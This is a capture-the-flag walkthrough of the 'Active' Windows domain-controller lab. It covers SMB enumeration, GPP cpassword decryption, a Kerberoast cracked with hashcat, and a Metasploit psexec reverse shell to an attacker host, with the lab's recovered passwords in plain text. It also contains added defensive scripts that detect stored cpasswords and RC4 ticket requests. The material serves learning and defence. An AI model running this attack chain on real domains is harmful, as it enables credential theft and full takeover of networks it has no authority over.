Active

OS: Windows, Difficulty: Easy, IP: 10.10.10.100

Initial Enumeration

# Nmap 7.70 scan initiated Fri Jul 26 15:34:45 2019 as: nmap -sV -sC -O -A -oN O-Detailed -p 53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,38446,47001 10.10.10.100
Nmap scan report for 10.10.10.100
Host is up (0.22s latency).

PORT      STATE  SERVICE       VERSION
53/tcp    open   domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open   kerberos-sec  Microsoft Windows Kerberos (server time: 2019-07-26 09:58:04Z)
135/tcp   open   msrpc         Microsoft Windows RPC
139/tcp   open   netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open   ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open   microsoft-ds?
464/tcp   open   kpasswd5?
593/tcp   open   ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open   tcpwrapped
3268/tcp  open   ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open   tcpwrapped
5722/tcp  open   msrpc         Microsoft Windows RPC
9389/tcp  open   mc-nmf        .NET Message Framing
38446/tcp closed unknown
47001/tcp open   http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=7/26%OT=53%CT=38446%CU=41736%PV=Y%DS=2%DC=T%G=Y%TM=5D3
OS:AD102%P=x86_64-pc-linux-gnu)SEQ(SP=FC%GCD=1%ISR=107%TI=I%CI=I%II=I%SS=S%
OS:TS=7)SEQ(SP=FC%GCD=1%ISR=107%TI=I%CI=I%TS=7)SEQ(SP=FC%GCD=1%ISR=107%TI=I
OS:%CI=I%II=I%TS=7)OPS(O1=M54DNW8ST11%O2=M54DNW8ST11%O3=M54DNW8NNT11%O4=M54
OS:DNW8ST11%O5=M54DNW8ST11%O6=M54DST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%
OS:W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%O=M54DNW8NNS%CC=N%Q=)T1(R=Y%DF=
OS:Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q
OS:=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%
OS:A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%
OS:DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%
OS:O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD
OS:=G)IE(R=Y%DFI=N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -6m50s, deviation: 0s, median: -6m50s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2019-07-26 15:29:12
|_  start_date: 2019-07-26 15:19:25

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   222.63 ms 10.10.14.1
2   222.77 ms 10.10.10.100

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jul 26 15:38:02 2019 -- 1 IP address (1 host up) scanned in 197.65 seconds

$ smbmap -u "" -H 10.10.10.100
[+] Finding open SMB ports....       
[+] User SMB session establishd on 10.10.10.100...                         
[+] IP: 10.10.10.100:445        Name: 10.10.10.100                                                                                                     
        Disk                                                    Permissions
        ----                                                    -----------
        ADMIN$                                                  NO ACCESS  
        C$                                                      NO ACCESS  
        IPC$                                                    NO ACCESS  
        NETLOGON                                                NO ACCESS  
        Replication                                             READ ONLY  
        SYSVOL                                                  NO ACCESS  
        Users                                                   NO ACCESS  


Fetch the Groups.xml file from the anonymously readable Replication share and decrypt its cpassword value to get the credentials of the SVC_TGS user.

$ smbclient -U "" \\\\10.10.10.100\\Replication "" -c 'get \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml'
$ python Gpprefdecrypt.py "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
GPPstillStandingStrong2k18
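The Groups.xml finding above is the classic MS14-025 leftover: a Group Policy Preference item that still stores a cpassword in SYSVOL, readable by anyone who can read the share. The following is an added example for this write-up (not a tool from the original page or from Impacket) that sweeps a SYSVOL-style directory tree for every GPP item type that can carry a cpassword and reports the account it belongs to, which is the check a domain owner would run before an attacker does. The sample tree built by build_sample_sysvol() is constructed for the demo and mirrors the path seen on the box.

```python
# Added example for this write-up (not a tool from the original page): sweep a
# SYSVOL-style tree for Group Policy Preference XML files that still carry a
# cpassword attribute. The sample tree is constructed for the demo.
import tempfile
import xml.etree.ElementTree as ET
from pathlib import Path

# GPP item types whose XML can embed a cpassword (lower-cased for matching,
# since SYSVOL is normally served from a case-insensitive file system).
GPP_FILES = {"groups.xml", "services.xml", "scheduledtasks.xml",
             "datasources.xml", "drives.xml", "printers.xml"}

# Attributes that name the account a cpassword belongs to, per item type.
ACCOUNT_ATTRS = ("userName", "newName", "accountName", "runAs", "username")


def find_cpasswords(sysvol_root):
    """Return a list of (relative path, element tag, account, cpassword) for
    every GPP XML element under sysvol_root that carries a cpassword."""
    root = Path(sysvol_root)
    findings = []
    for path in sorted(root.rglob("*.xml")):
        if path.name.lower() not in GPP_FILES:
            continue
        try:
            tree = ET.parse(path)
        except ET.ParseError:
            continue  # a malformed file must not abort the whole sweep
        for elem in tree.iter():
            cpw = elem.attrib.get("cpassword")
            if cpw is None:
                continue  # only elements with a stored password are findings
            account = next((elem.attrib[a] for a in ACCOUNT_ATTRS
                            if elem.attrib.get(a)), "<unknown>")
            findings.append((path.relative_to(root).as_posix(), elem.tag,
                             account, cpw))
    return findings


def build_sample_sysvol():
    """Create a throwaway SYSVOL layout (constructed for the demo): one
    Groups.xml with a cpassword, under the same GPO path as on the box, and
    one Drives.xml without stored credentials."""
    base = Path(tempfile.mkdtemp(prefix="sysvol_demo_"))
    gpo = (base / "active.htb" / "Policies"
           / "{31B2F340-016D-11D2-945F-00C04FB984F9}" / "MACHINE" / "Preferences")
    (gpo / "Groups").mkdir(parents=True)
    (gpo / "Drives").mkdir(parents=True)
    (gpo / "Groups" / "Groups.xml").write_text(r"""<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="active.htb\SVC_TGS">
    <Properties action="U" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
                userName="active.htb\SVC_TGS"/>
  </User>
</Groups>
""", encoding="utf-8")
    # A mapped-drive preference with no stored credentials: must not be flagged.
    (gpo / "Drives" / "Drives.xml").write_text(
        '<?xml version="1.0" encoding="utf-8"?>\n<Drives><Drive name="H:">'
        '<Properties action="U" path="\\\\dc\\home" useLetter="1"/></Drive></Drives>\n',
        encoding="utf-8")
    return base


if __name__ == "__main__":
    for rel, tag, account, cpw in find_cpasswords(build_sample_sysvol()):
        print(f"{rel}: <{tag}> account={account} cpassword={cpw[:12]}...")
```

Point it at a mounted copy of SYSVOL (or the Replication share) instead of the sample tree. Any hit means the item should be removed and the account's password rotated: the patch only stops new cpassword values from being written, it does not clean up existing ones.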
$ smbmap -u "SVC_TGS" -p "GPPstillStandingStrong2k18" -H 10.10.10.100                                                                                  
[+] Finding open SMB ports....       
[+] User SMB session establishd on 10.10.10.100...                         
[+] IP: 10.10.10.100:445        Name: 10.10.10.100                                                                                                     
        Disk                                                    Permissions
        ----                                                    -----------
        ADMIN$                                                  NO ACCESS  
        C$                                                      NO ACCESS  
        IPC$                                                    NO ACCESS  
        NETLOGON                                                READ ONLY  
        Replication                                             READ ONLY  
        SYSVOL                                                  READ ONLY  
        Users                                                   READ ONLY  

$ python GetUserSPNs.py -dc-ip 10.10.10.100 -request active.htb/SVC_TGS:GPPstillStandingStrong2k18

Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                  
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-19 00:36:40.351723  2018-07-30 22:47:40.656520 

$krb5tgs$23$****..........HUGE VALUE
hashcat -m 13100 -a 0 -o admin-cracked -d 1 -D 1 admin-hash /usr/share/wordlists/rockyou.txt --force

Used hashcat (mode 13100) with rockyou.txt to crack the TGS hash offline. The password for the Administrator user is Ticketmaster1968.
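The GetUserSPNs step and the hashcat crack together are a Kerberoast: any domain user can ask the KDC for a service ticket to an SPN, and when the ticket is issued with RC4-HMAC (etype 23, the `$krb5tgs$23$` prefix hashcat mode 13100 expects) its encrypted part can be cracked offline against the service account's password. On the DC side each such request is a Security event 4769, so the detection is to surface 4769 records where a user-account SPN got an RC4 ticket. The following is an added example for this write-up (not from the original page) that applies that rule over constructed 4769/4768 records; the one-JSON-object-per-line shape with EventData field names is an assumption about how a SIEM export would look.

```python
# Added example for this write-up (not from the original page): a small
# detection pass over Windows Security event 4769 ("A Kerberos service ticket
# was requested") records. A user-account SPN ticket issued with RC4-HMAC
# (etype 0x17) is the $krb5tgs$23$ material hashcat -m 13100 cracks, so those
# requests are the ones to surface. The records below are constructed.
import json

RC4_HMAC = 0x17             # etype 23, the crack-friendly ticket type
AES_TYPES = {0x11, 0x12}    # AES128 / AES256: what service accounts should use

# Constructed records in the shape of 4769/4768 EventData fields, one JSON
# object per line (an assumed SIEM export format).
SAMPLE_LOG = """
{"EventID": 4769, "TargetUserName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "Administrator", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.13", "Status": "0x0"}
{"EventID": 4769, "TargetUserName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "DC$", "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.14.13", "Status": "0x0"}
{"EventID": 4769, "TargetUserName": "jdoe@ACTIVE.HTB", "ServiceName": "krbtgt", "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.10.50", "Status": "0x0"}
{"EventID": 4769, "TargetUserName": "DC$@ACTIVE.HTB", "ServiceName": "DC$", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.10.100", "Status": "0x0"}
{"EventID": 4768, "TargetUserName": "SVC_TGS", "ServiceName": "krbtgt", "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.14.13", "Status": "0x0"}
{"EventID": 4769, "TargetUserName": "jdoe@ACTIVE.HTB", "ServiceName": "Administrator", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.10.50", "Status": "0x12"}
"""


def parse_events(text):
    """Parse one JSON record per non-empty line."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def is_roastable_request(ev):
    """True when a ticket for a user-account SPN was actually issued (Status
    0x0) with RC4-HMAC encryption."""
    if ev.get("EventID") != 4769 or ev.get("Status") != "0x0":
        return False
    svc = ev.get("ServiceName", "")
    # Computer accounts (trailing $) and the krbtgt service are not what a
    # Kerberoast targets; their RC4 tickets are noise for this rule.
    if svc.endswith("$") or svc.lower() == "krbtgt":
        return False
    return int(ev.get("TicketEncryptionType", "0x0"), 16) == RC4_HMAC


def kerberoast_report(text):
    """Group flagged requests by requesting account:
    {requester: {"spns": [service accounts], "sources": [client IPs]}}."""
    report = {}
    for ev in parse_events(text):
        if not is_roastable_request(ev):
            continue
        entry = report.setdefault(ev["TargetUserName"],
                                  {"spns": set(), "sources": set()})
        entry["spns"].add(ev["ServiceName"])
        entry["sources"].add(ev["IpAddress"])
    # Sorted lists keep the output deterministic and easy to assert on.
    return {who: {k: sorted(v) for k, v in e.items()}
            for who, e in report.items()}


if __name__ == "__main__":
    for who, e in kerberoast_report(SAMPLE_LOG).items():
        print(f"{who} obtained RC4 tickets for {e['spns']} from {e['sources']}")
```

Two things the rule deliberately leaves out are worth tuning per domain: failed requests (the jdoe record with Status 0x12) did not hand over a ticket but still show intent and deserve their own alert, and a burst of many distinct SPNs from one requester in seconds is the signature of a bulk `-request` run. The fix on the account side is the one this box lacks: service accounts with AES-only msDS-SupportedEncryptionTypes, long random or gMSA-managed passwords, and no SPN on a privileged account such as Administrator.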

User Own

Root Own

msf5 > use exploit/windows/smb/psexec
msf5 exploit(windows/smb/psexec) > show options                            

Module options (exploit/windows/smb/psexec):                               

   Name                  Current Setting  Required  Description            
   ----                  ---------------  --------  -----------            
   RHOSTS                                 yes       The target address range or CIDR identifier                                                        
   RPORT                 445              yes       The SMB service port (TCP)                                                                         
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing                                     
   SERVICE_DISPLAY_NAME                   no        The service display name                                                                           
   SERVICE_NAME                           no        The service name       
   SHARE                 ADMIN$           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share 
   SMBDomain             .                no        The Windows domain to use for authentication                                                       
   SMBPass                                no        The password for the specified username                                                            
   SMBUser                                no        The username to authenticate as                                                                    


Exploit target:                      

   Id  Name                          
   --  ----                          
   0   Automatic                     


msf5 exploit(windows/smb/psexec) > set RHOSTS 10.10.10.100                 
RHOSTS => 10.10.10.100               
msf5 exploit(windows/smb/psexec) > set SMBUser Administrator               
SMBUser => Administrator             
msf5 exploit(windows/smb/psexec) > set SMBPass Ticketmaster1968            
SMBPass => Ticketmaster1968          
msf5 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 10.10.14.13:4444                        
[*] 10.10.10.100:445 - Connecting to the server...                         
[*] 10.10.10.100:445 - Authenticating to 10.10.10.100:445 as user 'Administrator'...                                                                   
[*] 10.10.10.100:445 - Selecting PowerShell target                         
[*] 10.10.10.100:445 - Executing the payload...                            
[+] 10.10.10.100:445 - Service start timed out, OK if running a command or non-service executable...                                                   
[*] Sending stage (179779 bytes) to 10.10.10.100                           
[*] Meterpreter session 1 opened (10.10.14.13:4444 -> 10.10.10.100:61166) at 2019-07-26 17:53:45 +0530                                                 

msf5 exploit(windows/smb/psexec) > sessions -l                             

Active sessions                      
===============                      

  Id  Name  Type                     Information               Connection  
  --  ----  ----                     -----------               ----------  
  1         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ DC  10.10.14.13:4444 -> 10.10.10.100:61166 (10.10.10.100)

C:\Users\Administrator\Desktop>type root.txt                               
type root.txt                        
b5fc7***

C:\Users\SVC_TGS\Desktop>type user.txt                               
type user.txt                        
86d67***

Learning Outcome

This was a fun box; it taught me new things about Windows AD testing, hashcat, and the PsExec attack.
